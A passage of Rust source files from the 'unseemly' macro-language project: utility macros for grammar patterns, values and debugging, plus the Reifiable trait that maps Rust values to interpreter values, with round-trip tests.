std::rc::Rc::new(form_pat!($body)) ),* ] )}; ((biased $lhs:tt, $rhs:tt)) => { crate::grammar::FormPat::Biased(std::rc::Rc::new(form_pat!($lhs)), std::rc::Rc::new(form_pat!($rhs))) }; ((call $n:expr)) => { crate::grammar::FormPat::Call(crate::name::n($n)) }; ((call_by_name $n:expr)) => { crate::grammar::FormPat::Call($n) }; ((scope $f:expr)) => { crate::grammar::FormPat::Scope($f, crate::beta::ExportBeta::Nothing) }; ((scope $f:expr, $ebeta:tt)) => { crate::grammar::FormPat::Scope($f, ebeta!($ebeta)) }; ((pick $body:tt, $n:expr)) => { crate::grammar::FormPat::Pick(std::rc::Rc::new(form_pat!($body)), crate::name::n($n)) }; ((named $n:expr, $body:tt)) => { crate::grammar::FormPat::Named(crate::name::n($n), std::rc::Rc::new(form_pat!($body))) }; ((import $beta:tt, $body:tt)) => { crate::grammar::FormPat::NameImport(std::rc::Rc::new(form_pat!($body)), beta!($beta)) }; ((import_phaseless $beta:tt, $body:tt)) => { crate::grammar::FormPat::NameImportPhaseless( std::rc::Rc::new(form_pat!($body)), beta!($beta)) }; ((++ 
$pos:tt $body:tt)) => { // `pos` should be an expr, but I didn't want a comma. Name it. crate::grammar::FormPat::QuoteDeepen(std::rc::Rc::new(form_pat!($body)), $pos) }; ((-- $depth:tt $body:tt)) => { crate::grammar::FormPat::QuoteEscape(std::rc::Rc::new(form_pat!($body)), $depth) }; ((extend_nt $lhs:tt, $n:expr, $f:expr)) => { crate::grammar::FormPat::SynImport( std::rc::Rc::new(form_pat!($lhs)), std::rc::Rc::new(crate::grammar::FormPat::Call(crate::name::n($n))), crate::grammar::SyntaxExtension(std::rc::Rc::new(Box::new($f)))) }; ((extend $lhs:tt, $body:tt, $f:expr)) => { crate::grammar::FormPat::SynImport( std::rc::Rc::new(form_pat!($lhs)), std::rc::Rc::new(form_pat!($body)), crate::grammar::SyntaxExtension(std::rc::Rc::new(Box::new($f)))) }; ( [$($body:tt),*] ) => { crate::grammar::FormPat::Seq(vec![ $( std::rc::Rc::new(form_pat!($body)) ),* ])}; ((, $interpolate:expr)) => { $interpolate } } macro_rules! syn_env { () => { crate::util::assoc::Assoc::new() }; ( $k:tt => $rhs:tt $(, $k_cdr:tt => $rhs_cdr:tt)* ) => { syn_env!( $( $k_cdr => $rhs_cdr ),* ) .set(crate::name::n(expr_ify!($k)), Rc::new(form_pat!($rhs))) }; } // Utility for constructing `Custom` walks // Seems impossible to make this a function, for lifetime/sizedness reasons. macro_rules! cust_rc_box { ($contents:expr) => { crate::ast_walk::WalkRule::Custom(std::rc::Rc::new(Box::new($contents))) }; } // Form definitions macro_rules! basic_typed_form { ( $p:tt, $gen_type:expr, $eval:expr ) => { Rc::new(crate::form::Form { name: crate::name::n("unnamed form"), grammar: Rc::new(form_pat!($p)), type_compare: crate::form::Positive(crate::ast_walk::WalkRule::NotWalked), synth_type: crate::form::Positive($gen_type), quasiquote: crate::form::Both( crate::ast_walk::WalkRule::LiteralLike, crate::ast_walk::WalkRule::LiteralLike, ), eval: crate::form::Positive($eval), }) }; } macro_rules! 
typed_form { ( $name:expr, $p:tt, $gen_type:expr, $eval:expr ) => { Rc::new(crate::form::Form { name: crate::name::n($name), grammar: Rc::new(form_pat!($p)), type_compare: crate::form::Positive(crate::ast_walk::WalkRule::NotWalked), synth_type: crate::form::Positive($gen_type), quasiquote: crate::form::Both( crate::ast_walk::WalkRule::LiteralLike, crate::ast_walk::WalkRule::LiteralLike, ), eval: crate::form::Positive($eval), }) }; } macro_rules! negative_typed_form { ( $name:expr, $p:tt, $gen_type:expr, $eval:expr ) => { Rc::new(crate::form::Form { name: crate::name::n($name), grammar: Rc::new(form_pat!($p)), type_compare: crate::form::Positive(crate::ast_walk::WalkRule::NotWalked), synth_type: crate::form::Negative($gen_type), quasiquote: crate::form::Both( crate::ast_walk::WalkRule::LiteralLike, crate::ast_walk::WalkRule::LiteralLike, ), eval: crate::form::Negative($eval), }) }; } // Value // (This is exported so `cli.rs` can use it. TODO: bring those tests back into the library.) #[macro_export] macro_rules! val { (i $i:expr) => { crate::runtime::eval::Value::Int(::num::bigint::BigInt::from($i)) }; (b $b:expr) => { crate::runtime::eval::Value::Enum( crate::name::n(if $b {"True"} else {"False"}), vec![]) }; (s $s:expr) => { crate::runtime::eval::Value::Text( String::from($s) ) }; (f $body:tt, $params:expr, $env:tt) => { crate::runtime::eval::Value::Function( std::rc::Rc::new(::runtime::eval::Closure(ast!($body), $params, assoc_n! $env))) }; (bif $f:expr) => { crate::runtime::eval::Value::BuiltInFunction(::runtime::eval::BIF(std::rc::Rc::new($f))) }; (ast $body:tt) => { crate::runtime::eval::Value::AbstractSyntax(ast!($body)) }; (struct $( $k:tt => $v:tt ),* ) => { crate::runtime::eval::Value::Struct(assoc_n!( $( $k => val! $v),* )) }; (enum $nm:expr, $($v:tt),*) => { crate::runtime::eval::Value::Enum(crate::name::n($nm), vec![ $( val! $v ),* ]) }; (seq $($v:tt)*) => { crate::runtime::eval::Value::Sequence(vec![ $( std::rc::Rc::new(val! 
$v) ),* ]) }; (cell $v:tt) => { crate::runtime::eval::Value::Cell(std::rc::Rc::new(std::cell::RefCell::new(val! $v) )) }; (, $interpolate:expr) => { $interpolate } } // core_values stuff macro_rules! mk_type { // TODO: maybe now use find_core_form and un-thread $se? ( [ ( $( $param:tt ),* ) -> $ret_t:tt ] ) => { ast!( { crate::core_forms::find_core_form("Type", "fn") ; "param" => [ $((, mk_type!($param) )),*], "ret" => (, mk_type!($ret_t)) }) }; ( $n:tt ) => { ast!({ "Type" $n : }) }; // atomic type } // Define a typed function macro_rules! tf { ( [ ( $($param_t:tt),* ) -> $ret_t:tt ] , ( $($param_p:pat),* ) => $body:expr) => { TypedValue { ty: mk_type!([ ( $($param_t),* ) -> $ret_t ] ), val: core_fn!( $($param_p),* => $body ) } }; ( $n:tt, $e:expr ) => { TypedValue { ty: mk_type!( $n ), val: $e } } } // Like `tf!`, but actually uses `ast!`, which is more flexible than `mk_type!` macro_rules! tyf { ( $t:tt, ( $($param_p:pat),* ) => $body:expr ) => { TypedValue { ty: ast!($t), val: core_fn!($($param_p),* => $body) } } } macro_rules! bind_patterns { ( $iter:expr; () => $body:expr ) => { $body }; ( $iter:expr; ($p_car:pat, $($p_cdr:pat,)* ) => $body:expr ) => { #[allow(unreachable_patterns)] // in case `$p_car` is irrefutable match $iter.next() { Some($p_car) => { bind_patterns!($iter; ($( $p_cdr, )*) => $body) } None => { icp!("too few arguments"); } Some(ref other) => { icp!("[type error] in argument: {:#?}", other); } } } } macro_rules! core_fn { ( $($p:pat),* => $body:expr ) => { BuiltInFunction(BIF(Rc::new( move | args | { let mut argi = args.into_iter(); bind_patterns!(argi; ($( $p, )*) => $body ) } ))) } } // Alpha #[macro_export] macro_rules! 
without_freshening { ($( $body:tt )*) => {{ let mut orig: bool = false; crate::alpha::freshening_enabled.with(|f| { orig = *f.borrow(); *f.borrow_mut() = false; }); { $( $body )* } crate::alpha::freshening_enabled.with(|f| { *f.borrow_mut() = orig; }); }} } // for core_forms // Unpacking `Ast`s into environments is a pain, so here's a macro for it macro_rules! expect_node { ( ($node:expr ; $form:expr) $env:ident ; $body:expr ) => { // This is tied to the signature of `Custom` if let crate::ast::Node(ref f, ref $env, _) = $node.c() { if *f == $form { $body } else { // TODO: make it possible to specify which one panic!( "ICP or type error: Expected a {:#?} node, got {:#?}, which is {:#?}.", $form, $node, *f ) } } else { panic!( "ICP or type error: Expected a {:#?} node, got {:#?}, which isn't a node.", $form, $node ) } }; } macro_rules! expect_ty_node { ( ($node:expr ; $form:expr ; $loc:expr) $env:ident ; $body:expr ) => {{ // This is tied to the signature of `Custom` let $env = $node.ty_destructure($form, $loc)?; $body }}; } macro_rules! _get_leaf_operation { ($env:expr, =, $name:tt) => { $env.get_leaf_or_panic(&crate::name::n(stringify!($name))) }; ($env:expr, *=, $name:tt) => { $env.get_rep_leaf_or_panic(crate::name::n(stringify!($name))) }; } // Bind names based on the contents of a `Node`. // Use `=` for plain leaves, or `*=` for repeated leaves. // This uses barewords like `u!` does, but it's fine for runtime use. // TODO: use this a lot more macro_rules! node_let { ( $node:expr => {$nt:tt $form:tt } $( $n:ident $operation:tt $name:tt ),* ) => ( // Extra element is to ensure it's a tuple and not trigger `unused_params`. let ( (), $( $n ),* ) = { expect_node!( ($node ; crate::core_forms::find_core_form(stringify!($nt), stringify!($form))) env ; ((), $( _get_leaf_operation!(env, $operation, $name) ),* ) ) }; ) } // TODO: get rid of these; just use `form_pat!((alt …))` directly. macro_rules! 
forms_to_form_pat { ( $( $form:expr ),* ) => { form_pat!((alt $( (scope $form) ),* )) } } macro_rules! forms_to_form_pat_export { ( $( $form:expr => $export:tt),* ) => { form_pat!((alt $( (scope $form, $export) ),* )) } } // panicking destructor (when the type system should offer protection) macro_rules! extract { (($v:expr) $( $expected:path = ( $( $sub:pat ),* ) => $body:expr);* ) => { match * $v { $( $expected ( $($sub),* ) => { $body } )* _ => { icp!("{:#?} isn't a {:#?}", $v, stringify!( $($expected),* )) } } } } // Reification helper (doesn't work on parameterized types...) // TODO: just delete this, or actually add `Smuggled(std::any::Any)` to `Value`. macro_rules! cop_out_reifiability { ( $underlying_type:ty, $ty_name:tt ) => { impl Reifiable for $underlying_type { fn ty_name() -> Name { n(stringify!($ty_name)) } fn reify(&self) -> Value { Value::Smuggled(self.clone()) } fn reflect(v: &Value) -> Self { extract!((v) Value::Smuggled = (ref s) => s.downcast_ref::<Self>().expect("Smuggling has gone terribly wrong!").clone()) } } } } macro_rules! vrep { ( $( $contents:tt )*) => { vrep_accum![ ( $( $contents )* , ) ] }; } macro_rules! vrep_accum { // For ease of parsing, expects a trailing comma! (($elt:expr, $($rest:tt)*) $($accum:tt)* ) => { // ... and produces a leading comma vrep_accum!(($($rest)*) $($accum)* , crate::util::vrep::VRepElt::Single($elt)) }; (($elt:expr => ( $( $driver:expr),* ), $($rest:tt)*) $($accum:tt)* ) => { vrep_accum!(($($rest)*) $($accum)* , crate::util::vrep::VRepElt::Rep($elt, vec![ $( crate::name::n(stringify!($driver)) ),* ]) ) }; // Expect the leading comma: (() , $($accum:tt)* ) => { crate::util::vrep::VRep(vec![ $( $accum )* ]) }; } // Testing #[macro_export] macro_rules! assert_m { ($got:expr, $expected:pat => $body:stmt) => {{ let got = $got; match got.clone() { $expected => { // The `()` is actually a unit to avoid an "unnecessary trailing semicolon warning". 
// The `;` is to keep `cargo fmt` from removing the non-unnecessary `{}`. $body(); } _ => assert!(false, "{:#?} does not match {:#?}", got, stringify!($expected)), } }}; // Deprecated: ($got:expr, $expected:pat, $body:expr) => {{ let got = $got; match got.clone() { $expected => assert!($body), _ => assert!(false, "{:#?} does not match {:#?}", got, stringify!($expected)), } }}; ($got:expr, $expected:pat) => { assert_m!($got, $expected, true) }; } macro_rules! layer_watch { {$layer:ident : $( $body:stmt );* } => { $layer.with(|l| l.borrow_mut().0 += 1); // layers $layer.with(|l| l.borrow_mut().1 += 1); // steps let res = { $( $body )* }; $layer.with(|l| l.borrow_mut().0 -= 1); res } } // "Layer debug" macro_rules! ld { ($layer:ident, $enabled:expr, $template:tt, $($arg:expr),*) => {{ if $enabled.with(|e| *e) { let layers = $layer.with(|l| l.borrow().0) - 1; for i in 1..layers { if i % 2 == 0 { print!("║ ") } else { print!("│ "); } } if layers > 0 { if layers % 2 == 0 { print!("╠═") } else { print!("├─"); } } print!($template, $($arg),*); print!(" ({})", $layer.with(|l| l.borrow().1)); println!(); } }} } // "Layer debug, continued" macro_rules! lc { ($layer:ident, $enabled:expr, $template:tt, $($arg:expr),*) => {{ if $enabled.with(|e| *e) { let layers = $layer.with(|l| l.borrow().0) - 1; for i in 1..(layers+1) { if i % 2 == 0 { print!("║ ") } else { print!("│ "); } } println!($template, $($arg),*); } }} }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/mod.rs
src/macros/mod.rs
#![macro_use] pub mod flimsy_syntax; pub mod macros; pub mod reification_macros;
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/reify.rs
src/runtime/reify.rs
// Designed for `use reify::*` pub use crate::{ast::Ast, name::*, runtime::eval::Value}; use crate::runtime::eval; use num::bigint::BigInt; use std::rc::Rc; /// This is for parts of this compiler that need to be represented as object-level values. /// Almost all of it, turns out! /// /// Since this language is extensible, we need to connect the Rust code in the compiler /// with the Unseemly code that actually gets evaluated. /// This is where the magic happens. /// /// Suppose that `T` is a two-argument generic type. /// Generally, we plan on executing code in an environment in which /// `T::<Irr,Irr>::name()` is bound to `T::<Irr,Irr>::ty()`. /// (The type arguments do not affect `name` and `ty`; `()` is convention.) /// Then, we can use `T::<SomeActualArg, OtherActualArg>::ty_invocation()` in that environment. /// /// This is also where ICPs can happen, so make sure that ::ty() is consistent with ::reify(). pub trait Reifiable { /// The Unseemly type that corresponds to to the `Reifiable` type. /// This leaves abstract the type parameters of `Self`; invoke like `Self::<Irr,Irr>::ty()`. /// e.g. `∀ A. Pair<A int>` /// TODO: rename to `generic_ty` fn ty() -> Ast { // By default, this is an opaque primitive. crate::core_type_forms::get__primitive_type(Self::ty_name()) } /// A name for that type, so that recursive types are okay. /// Ignore the type parameters of `Self`; invoke like `Self::<Irr,Irr>::ty_name()`. /// e.g. `WithInteger` fn ty_name() -> Name; /// How to refer to this type, given an environment in which /// `ty_name()` is defined to be `ty()`. /// Parameters will be concrete. /// e.g. `WithInteger<Float>` /// (Types using this type will use this, rather than `ty`) /// Don't override this. 
fn ty_invocation() -> Ast { let name_ref = ast!((vr Self::ty_name())); match Self::concrete_arguments() { None => name_ref, Some(args) => ast!({ "Type" "type_apply" : "type_rator" => (, name_ref), "arg" => (,seq args) }), } } // Override this to set the type arguments for invocation. fn concrete_arguments() -> Option<Vec<Ast>> { None } /// The Unseemly value that corresponds to a value. fn reify(&self) -> Value; /// Get a value from an Unseemly value fn reflect(_: &Value) -> Self; } // Core values macro_rules! basic_reifiability { ( $underlying_type:ty, $ty_name:tt, $value_name:ident ) => { impl Reifiable for $underlying_type { fn ty_name() -> Name { n($ty_name) } // TODO: can we remove these clones? are they even bad? // They seem redundant in the `Name` case, at least fn reify(&self) -> Value { Value::$value_name(self.clone()) } fn reflect(v: &Value) -> Self { extract!((v) Value::$value_name = (ref i) => i.clone()) } } } } /// Irr: the irrelevant type (like `!`). Satisfies a bunch of traits; can't be created. #[derive(Copy, Clone, PartialEq, Eq, Debug, Hash)] pub enum Irr {} // No values can be created. 
impl std::fmt::Display for Irr { fn fmt(&self, _: &mut std::fmt::Formatter) -> std::fmt::Result { icp!() } } impl Default for Irr { fn default() -> Irr { icp!() } } impl Reifiable for Irr { fn ty_name() -> Name { icp!() } fn reify(&self) -> Value { icp!() } fn reflect(_: &Value) -> Self { icp!() } } impl crate::walk_mode::WalkElt for Irr { fn from_ast(_: &Ast) -> Self { icp!() } fn to_ast(&self) -> Ast { icp!() } } impl crate::walk_mode::WalkMode for Irr { fn name() -> &'static str { icp!() } type Elt = Irr; type Negated = NegIrr; type AsPositive = Irr; type AsNegative = NegIrr; type Err = Irr; type D = crate::walk_mode::Positive<Irr>; type ExtraInfo = Irr; fn get_walk_rule(_: &crate::form::Form) -> crate::ast_walk::WalkRule<Irr> { icp!() } fn automatically_extend_env() -> bool { icp!() } fn underspecified(_: Name) -> Irr { icp!() } } #[derive(Copy, Clone, PartialEq, Eq, Debug, Hash)] pub enum NegIrr {} impl Reifiable for NegIrr { fn ty_name() -> Name { icp!() } fn reify(&self) -> Value { icp!() } fn reflect(_: &Value) -> Self { icp!() } } impl crate::walk_mode::WalkMode for NegIrr { fn name() -> &'static str { icp!() } type Elt = Irr; type Negated = Irr; type AsPositive = Irr; type AsNegative = NegIrr; type Err = Irr; type D = crate::walk_mode::Negative<NegIrr>; type ExtraInfo = Irr; fn get_walk_rule(_: &crate::form::Form) -> crate::ast_walk::WalkRule<NegIrr> { icp!() } fn automatically_extend_env() -> bool { icp!() } fn underspecified(_: Name) -> Irr { icp!() } } impl crate::walk_mode::NegativeWalkMode for NegIrr { fn needs_pre_match() -> bool { panic!() } } basic_reifiability!(BigInt, "Int", Int); impl Reifiable for bool { fn ty_name() -> Name { n("Bool") } fn reify(&self) -> Value { eval::Value::Enum(n(if *self { "True" } else { "False" }), vec![]) } fn reflect(v: &Value) -> Self { extract!((v) Value::Enum = (ref name, _) => name == &n("True")) } } // note: operations for these shouldn't have BigInt semantics! 
// Rust machine integers all reify as `Value::Int` (a `BigInt`); reflection
// converts back via `num::ToPrimitive` and panics (`unwrap`) if the value
// doesn't fit the target type.

impl Reifiable for usize {
    fn ty_name() -> Name { n("Rust_usize") }

    fn reify(&self) -> Value { Value::Int(BigInt::from(*self)) }

    fn reflect(v: &Value) -> Self {
        use num::ToPrimitive;
        extract!((v) Value::Int = (ref i) => i.to_usize().unwrap())
    }
}

impl Reifiable for i32 {
    fn ty_name() -> Name { n("Rust_i32") }

    fn reify(&self) -> Value { Value::Int(BigInt::from(*self)) }

    fn reflect(v: &Value) -> Self {
        use num::ToPrimitive;
        extract!((v) Value::Int = (ref i) => i.to_i32().unwrap())
    }
}

impl Reifiable for u8 {
    fn ty_name() -> Name { n("Rust_u8") }

    fn reify(&self) -> Value { Value::Int(BigInt::from(*self)) }

    fn reflect(v: &Value) -> Self {
        use num::ToPrimitive;
        extract!((v) Value::Int = (ref i) => i.to_u8().unwrap())
    }
}

impl Reifiable for () {
    fn ty_name() -> Name { n("Unit") }

    // NOTE(review): unit reifies as the integer 0 here, while the built-in
    // functions in core_values.rs return `Sequence(vec![])` for a `Unit`
    // result — confirm this asymmetry is intended (reflect ignores the value,
    // so the roundtrip still works).
    fn reify(&self) -> Value { Value::Int(BigInt::from(0)) }

    fn reflect(_: &Value) -> Self {}
}

// A Rust 2-tuple reifies as a 2-element `Value::Sequence`.
impl<T0: Reifiable, T1: Reifiable> Reifiable for (T0, T1) {
    fn ty_name() -> Name { n("Tuple2") }

    fn concrete_arguments() -> Option<Vec<Ast>> {
        Some(vec![T0::ty_invocation(), T1::ty_invocation()])
    }

    fn reify(&self) -> Value {
        Value::Sequence(vec![Rc::new(self.0.reify()), Rc::new(self.1.reify())])
    }

    fn reflect(v: &Value) -> Self {
        extract!((v) Value::Sequence = (ref s) => (T0::reflect(&*s[0]), T1::reflect(&*s[1])))
    }
}

// A Rust `String` reifies as an atom of abstract syntax, not as `Value::Text`;
// reflection reads the atom's name back out with its original spelling.
impl Reifiable for String {
    fn ty_name() -> Name { n("Rust_str") }

    fn reify(&self) -> Value { val!(ast (at self)) }

    fn reflect(v: &Value) -> Self {
        match v {
            eval::AbstractSyntax(at_ast) => at_ast.to_name().orig_sp(),
            _ => icp!(),
        }
    }
}

// `Value` reifies as itself (identity).
// This is right, right?
impl Reifiable for Value {
    fn ty_name() -> Name { n("any") }

    fn reify(&self) -> Value { self.clone() }

    fn reflect(v: &Value) -> Self { v.clone() }
}

// TODO: when returning traits works, just make functions `Reifiable`
// TOUNDERSTAND: 'x also allows things to be owned instead?!?
// Wrap a 1-argument Rust function as an Unseemly built-in: reflect the
// argument, call `f`, reify the result.
pub fn reify_1ary_function<A: Reifiable + 'static, R: Reifiable + 'static>(
    f: Rc<Box<(dyn Fn(A) -> R)>>,
) -> Value {
    Value::BuiltInFunction(eval::BIF(Rc::new(move |args: Vec<Value>| {
        ((*f)(A::reflect(&args[0]))).reify()
    })))
}

// Turn an Unseemly function value (built-in or closure) back into a callable
// Rust function. For closures, each call evaluates the closure body with the
// parameter bound in its captured environment.
pub fn reflect_1ary_function<A: Reifiable + 'static, R: Reifiable + 'static>(
    f_v: Value,
) -> Rc<Box<(dyn Fn(A) -> R)>> {
    Rc::new(Box::new(move |a: A| {
        extract!((&f_v)
            Value::BuiltInFunction = (ref bif) => R::reflect(&(*bif.0)(vec![a.reify()]));
            Value::Function = (ref closure) => {
                R::reflect(&eval::eval(&closure.body,
                    closure.env.clone().set(closure.params[0], a.reify())).unwrap())
            })
    }))
}

// I bet there's more of a need for reification than reflection for functions....

// 2-argument version of `reify_1ary_function`.
pub fn reify_2ary_function<
    A: Reifiable + 'static,
    B: Reifiable + 'static,
    R: Reifiable + 'static,
>(
    f: Rc<Box<(dyn Fn(A, B) -> R)>>,
) -> Value {
    Value::BuiltInFunction(eval::BIF(Rc::new(move |args: Vec<Value>| {
        ((*f)(A::reflect(&args[0]), B::reflect(&args[1]))).reify()
    })))
}

// 2-argument version of `reflect_1ary_function`.
pub fn reflect_2ary_function<
    A: Reifiable + 'static,
    B: Reifiable + 'static,
    R: Reifiable + 'static,
>(
    f_v: Value,
) -> Rc<Box<(dyn Fn(A, B) -> R)>> {
    Rc::new(Box::new(move |a: A, b: B| {
        extract!((&f_v)
            Value::BuiltInFunction = (ref bif) =>
                R::reflect(&(*bif.0)(vec![a.reify(), b.reify()]));
            Value::Function = (ref closure) => {
                R::reflect(&eval::eval(&closure.body,
                    closure.env.clone().set(closure.params[0], a.reify())
                        .set(closure.params[1], b.reify())).unwrap())
            })
    }))
}

// Placeholder: the function type is not generated yet.
pub fn ty_of_1ary_function<A: Reifiable + 'static, R: Reifiable + 'static>() -> Ast {
    ast!("TODO: generate type")
}

// Build an `Assoc` mapping each listed Rust type's Unseemly name to its
// reified type `Ast`.
macro_rules! reify_types {
    ( $($t:ty),* ) => {{
        let mut res = Assoc::new();
        $( res = res.set(<$t as Reifiable>::ty_name(), <$t as Reifiable>::ty()); )*
        res
    }}
}

// A `Reifiable` impl whose reify/reflect simply panic — for types (used only
// in tests below) that need the trait bound but never cross the boundary.
macro_rules! fake_reifiability {
    ( $underlying_type:ty ) => {
        impl Reifiable for $underlying_type {
            fn ty_name() -> Name { n(stringify!($underlying_type)) }

            fn reify(&self) -> Value { panic!() }

            fn reflect(_: &Value) -> Self { panic!() }
        }
    };
}

// impl<A: Reifiable, R: Reifiable> Reifiable for Box<Fn(A) -> R> {
//     fn ty() -> Ast { panic!("") }
//
//     fn reify(&self) -> Value { panic!("") }
//
//     fn reflect(v: &Value) -> Self { panic!("") }
// }

// We can't add derive() to existing types, but we can `impl` these ourselves directly

// This feels a little awkward, just dropping the `Rc`ness on the floor.
// But I think `Value` has enough `Rc` inside that nothing can go wrong... right?
impl<T: Reifiable> Reifiable for Rc<T> {
    fn ty() -> Ast { T::ty() }

    fn ty_name() -> Name { T::ty_name() }

    fn concrete_arguments() -> Option<Vec<Ast>> { T::concrete_arguments() }

    fn reify(&self) -> Value { (**self).reify() }

    fn reflect(v: &Value) -> Self { Rc::new(T::reflect(v)) }
}

/// Takes the Unseemly type `T` to `Sequence<T>`
pub fn sequence_type__of(ty: &Ast) -> Ast {
    ast!({ "Type" "type_apply" :
        "type_rator" => (, crate::core_type_forms::get__primitive_type(n("Sequence"))),
        "arg" => [(, ty.clone()) ]})
}

/// Takes the Unseemly type `Sequence<T>` to `T`
pub fn un__sequence_type(ty: &Ast, loc: &Ast) -> Result<Ast, crate::ty::TypeError> {
    // This is a hack; `Sequence` is not a nonterminal!
    crate::core_type_forms::less_quoted_ty(ty, Some(n("Sequence")), loc)
}

// `Vec<T>` reifies as the Unseemly `Sequence` type.
impl<T: Reifiable> Reifiable for Vec<T> {
    fn ty_name() -> Name { n("Sequence") }

    fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![T::ty_invocation()]) }

    fn reify(&self) -> Value {
        Value::Sequence(self.iter().map(|elt| Rc::new(elt.reify())).collect())
    }

    fn reflect(v: &Value) -> Self {
        extract!((v) Value::Sequence = (ref s) =>
            s.iter().map(|elt| T::reflect(&elt)).collect() )
    }
}

// `Box<T>` is transparent, like `Rc<T>` above.
impl<T: Reifiable> Reifiable for std::boxed::Box<T> {
    fn ty() -> Ast { T::ty() }

    fn ty_name() -> Name { T::ty_name() }

    fn concrete_arguments() -> Option<Vec<Ast>> { T::concrete_arguments() }

    fn reify(&self) -> Value { (**self).reify() }

    fn reflect(v: &Value) -> Self { std::boxed::Box::new(T::reflect(v)) }
}

// The roundtrip will de-alias the cell, sadly.
impl<T: Reifiable> Reifiable for std::cell::RefCell<T> {
    fn ty_name() -> Name { n("Rust_RefCell") }

    fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![T::ty_invocation()]) }

    fn reify(&self) -> Value { self.borrow().reify() }

    fn reflect(v: &Value) -> Self { std::cell::RefCell::<T>::new(T::reflect(v)) }
}

// `PhantomData` carries no data; it reifies as a dummy integer.
impl<T: Reifiable> Reifiable for std::marker::PhantomData<T> {
    fn ty_name() -> Name { n("PhantomData") }

    fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![T::ty_invocation()]) }

    fn reify(&self) -> Value { Value::Int(BigInt::from(0)) }

    fn reflect(_: &Value) -> Self { std::marker::PhantomData }
}

// Hey, I know how to generate the implementation for this...
Reifiable! {
    () pub enum Option<T> {
        None,
        Some(T)
    }
}

Reifiable! {
    () pub enum Result<T, E> {
        Ok(T),
        Err(E),
    }
}

// for testing
custom_derive! {
    #[derive(Debug, PartialEq, Eq, Reifiable, Clone)]
    struct BasicStruct {
        pub a: BigInt, // TODO: change to String to test heterogeneity
        b: BigInt
    }
}

custom_derive!
// (Continues the `custom_derive!` invocation opened just above.)
// The types in this section exist only to exercise the `Reifiable` derive
// in the tests below.
{
    #[derive(Debug, PartialEq, Eq, Reifiable, Clone)]
    struct NestedStruct {
        x: BasicStruct
    }
}

// A `Name` carrying a (phantom) lifetime, to test the `Reifiable(lifetime)`
// derive flavor.
#[derive(Debug, PartialEq, Eq, Clone)]
struct OldName<'t> {
    actual: Name,
    pd: std::marker::PhantomData<&'t u32>,
}

fn new_oldname<'t>(nm: Name) -> OldName<'t> {
    OldName { actual: nm, pd: std::marker::PhantomData }
}

impl<'t> Reifiable for OldName<'t> {
    fn ty_name() -> Name { n("OldName") }

    fn reify(&self) -> Value { self.actual.reify() }

    fn reflect(v: &Value) -> Self { new_oldname(Name::reflect(v)) }
}

custom_derive! {
    #[derive(Debug, PartialEq, Eq, Reifiable(lifetime), Clone)]
    enum BasicLifetimeEnum<'t> {
        Only(OldName<'t>)
    }
}

custom_derive! {
    #[derive(Debug, PartialEq, Eq, Reifiable, Clone)]
    enum BasicEnum {
        Jefferson(BigInt, BigInt), // TODO: change the first one to String
        Burr(BigInt)
    }
}

custom_derive! {
    #[derive(Debug, PartialEq, Eq, Reifiable(lifetime), Clone)]
    struct ParameterizedLifetimeStruct<'t, T, S> {
        pub a: T,
        b: S,
        c: OldName<'t>
    }
}

// TODO: just write a macro that does a really faky custom_derive by calling `Reifiable!`
// around something and then putting down its definition.
// Reification round-trip tests: every derived/hand-written `Reifiable` impl
// above should satisfy `reflect(reify(x)) == x`.

#[test]
fn basic_reification() { assert_eq!(BigInt::from(1800).reify(), val!(i 1800)); }

#[test]
fn basic_reflection() { assert_eq!(BigInt::reflect(&val!(i 1800)), BigInt::from(1800)); }

#[test]
fn basic_r_and_r_roundtrip() {
    assert_eq!(BigInt::from(90), BigInt::reflect(&BigInt::from(90).reify()));

    let bsv = BasicStruct { a: BigInt::from(4), b: BigInt::from(5) };
    assert_eq!(bsv, BasicStruct::reflect(&bsv.reify()));

    let nsv = NestedStruct { x: bsv };
    assert_eq!(nsv, NestedStruct::reflect(&nsv.reify()));

    let bev0 = BasicEnum::Jefferson(BigInt::from(17), BigInt::from(1781));
    let bev1 = BasicEnum::Burr(BigInt::from(1781));
    assert_eq!(bev0, BasicEnum::reflect(&bev0.reify()));
    assert_eq!(bev1, BasicEnum::reflect(&bev1.reify()));

    // assert_eq!(None, Option::reflect(&None.reify()));
    assert_eq!(Some(BigInt::from(5)), Option::reflect(&Some(BigInt::from(5)).reify()));
    assert_eq!(Some(bev1.clone()), Option::reflect(&Some(bev1.clone()).reify()));
    assert_eq!(Rc::new(bev0.clone()), Rc::reflect(&Rc::new(bev0.clone()).reify()));
    assert_eq!(
        std::boxed::Box::new(bev0.clone()),
        std::boxed::Box::reflect(&std::boxed::Box::new(bev0.clone()).reify())
    );

    let bleo = BasicLifetimeEnum::Only(new_oldname(n("AlexanderHamilton")));
    assert_eq!(bleo, BasicLifetimeEnum::reflect(&bleo.reify()));

    let pls = ParameterizedLifetimeStruct::<BigInt, bool> {
        a: BigInt::from(10),
        b: false,
        c: new_oldname(n("DuelCommandments")),
    };
    assert_eq!(pls, ParameterizedLifetimeStruct::<BigInt, bool>::reflect(&pls.reify()));
}

#[test]
fn function_r_and_r_roundtrip() {
    // A Rust closure wrapped as a built-in and unwrapped again should behave
    // like the original closure.
    let f = |a: BigInt| a + BigInt::from(1);
    let f2 = reflect_1ary_function::<BigInt, BigInt>(reify_1ary_function(Rc::new(Box::new(f))));
    assert_eq!((*f2)(BigInt::from(1776)), BigInt::from(1777));
}

// Trait-bound-only types for `reified_types` (reify/reflect would panic).
struct T {}
fake_reifiability!(T);
struct S {}
fake_reifiability!(S);

#[test]
fn reified_types() {
    //"ParameterizedLifetimeStruct<Option<Rust_usize> integer>"
    assert_eq!(
        ParameterizedLifetimeStruct::<'static, Option<usize>, BigInt>::ty_invocation(),
        ast!({"Type" "type_apply" :
            "type_rator" => (vr "ParameterizedLifetimeStruct"),
            "arg" => [
                {"Type" "type_apply" :
                    "type_rator" => (vr "Option"),
                    "arg" => [ (vr "Rust_usize") ]
                },
                (vr "Int")]
        })
    );
    assert_eq!(
